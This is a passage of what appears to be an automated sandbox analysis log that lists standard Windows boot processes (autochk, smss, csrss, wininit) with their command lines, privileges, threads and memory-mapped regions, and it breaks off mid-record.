0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1008 os_tid = 0xe4 Thread: id = 1009 os_tid = 0xe8 Thread: id = 1023 os_tid = 0x124 Thread: id = 1034 os_tid = 0x168 Process: id = "660" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x7f1d1040" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = 
"BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36456 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36457 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36458 start_va = 0x450000 end_va = 0x4f5fff entry_point = 0x450000 region_type = mapped_file name = "autochk.exe" filename = "\\Windows\\System32\\autochk.exe" (normalized: "c:\\windows\\system32\\autochk.exe") Region: id = 36459 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36460 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36461 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36462 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36463 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1010 os_tid = 0xf0 Process: id = "661" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1040" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = 
"BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36502 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36503 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36504 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36505 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36506 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36507 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36508 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1024 os_tid = 0x12c Process: id = "662" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x7f1d1060" os_pid = "0x130" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "661" os_parent_pid = "0x128" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36511 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" filename = "" Region: id = 36512 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 36513 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 36514 start_va = 0x4a300000 end_va = 0x4a304fff entry_point = 0x4a300000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 36515 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36516 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36517 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36518 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 36519 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36520 start_va = 0x75cb0000 end_va = 0x75cbcfff entry_point = 0x75cb0000 
region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 36521 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca0000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 36522 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36523 start_va = 0x75c70000 end_va = 0x75c9bfff entry_point = 0x75c70000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 36524 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36525 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36526 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36527 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36528 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36529 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36530 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36535 start_va = 0x100000 end_va = 0x166fff entry_point = 0x100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36536 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 36537 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 36538 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36539 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x1a0000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 36540 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 36541 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 36542 start_va = 0x500000 end_va = 0x8f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 36543 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 36544 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" 
Region: id = 36545 start_va = 0x75c60000 end_va = 0x75c68fff entry_point = 0x75c60000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 36546 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36547 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36717 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36718 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 36719 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 36720 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 36721 start_va = 0x900000 end_va = 0x9c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 36722 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 36723 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 36724 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 36725 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36726 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffda000" filename = "" Region: id = 36727 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36728 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36779 start_va = 0x250000 end_va = 0x256fff entry_point = 0x250000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 36780 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 36781 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 36782 start_va = 0xb40000 end_va = 0xbbefff entry_point = 0xb40000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36783 start_va = 0xc10000 end_va = 0x180ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 36784 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 36785 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36786 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36795 start_va = 0x1870000 end_va = 0x18affff 
entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 36796 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36797 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36807 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36818 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36829 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36915 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 36916 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 36917 start_va = 0x1830000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 36918 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37109 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 37110 start_va = 0x18b0000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018b0000" filename = "" Region: id = 38069 start_va = 0x3e0000 end_va = 
0x3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 38070 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38071 start_va = 0xa50000 end_va = 0xa5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 38072 start_va = 0xa60000 end_va = 0xa61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 38073 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 38074 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 38075 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 38076 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 38077 start_va = 0x1930000 end_va = 0x19affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 38078 start_va = 0x19b0000 end_va = 0x1a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019b0000" filename = "" Region: id = 38082 start_va = 0xae0000 end_va = 0xae0fff entry_point = 0xae0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38083 start_va = 0xaf0000 end_va = 0xaf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 38827 start_va = 0xae0000 end_va = 0xaeffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 38828 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 38829 start_va = 0xbc0000 end_va = 0xbc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Thread: id = 1025 os_tid = 0x134 Thread: id = 1030 os_tid = 0x148 Thread: id = 1031 os_tid = 0x14c Thread: id = 1032 os_tid = 0x150 Thread: id = 1033 os_tid = 0x154 Thread: id = 1042 os_tid = 0x18c Thread: id = 1050 os_tid = 0x1a8 Thread: id = 1051 os_tid = 0x1ac Thread: id = 1057 os_tid = 0x1cc Thread: id = 1062 os_tid = 0x1e4 Process: id = "663" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1080" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36548 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36549 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 36550 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36551 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36552 start_va = 0x77d40000 end_va = 
0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36554 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36555 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1035 os_tid = 0x15c Process: id = "664" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x7f1d10a0" os_pid = "0x160" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "661" os_parent_pid = "0x128" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36556 start_va = 0x110000 end_va = 0x129fff entry_point = 0x110000 region_type = mapped_file name = "wininit.exe" filename = "\\Windows\\System32\\wininit.exe" (normalized: "c:\\windows\\system32\\wininit.exe") Region: id = 36557 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36558 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 36559 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36560 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 
region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36561 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36562 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36563 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36608 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36609 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36610 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36611 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36612 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36613 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36614 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36615 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36616 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36617 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36618 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36619 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36620 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36621 start_va = 0x4d0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36622 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36623 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 36624 start_va = 0x90000 
end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36625 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36626 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36627 start_va = 0x2a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36628 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36629 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36630 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36631 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36632 start_va = 0x4d0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36633 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 36634 start_va = 0x6a0000 end_va = 0xa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 36635 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 36636 
start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 36637 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36638 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36639 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 36640 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36693 start_va = 0x75c00000 end_va = 0x75c03fff entry_point = 0x75c00000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36694 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36695 start_va = 0xc40000 end_va = 0x1bc2fff entry_point = 0xc40000 region_type = mapped_file name = "batang.ttc" filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc") Region: id = 36696 start_va = 0xc40000 end_va = 0x1925fff entry_point = 0xc40000 region_type = mapped_file name = "gulim.ttc" filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc") Region: id = 36697 start_va = 0xc40000 end_va = 0x1062fff entry_point = 0xc40000 region_type = mapped_file name = "malgun.ttf" filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf") Region: id = 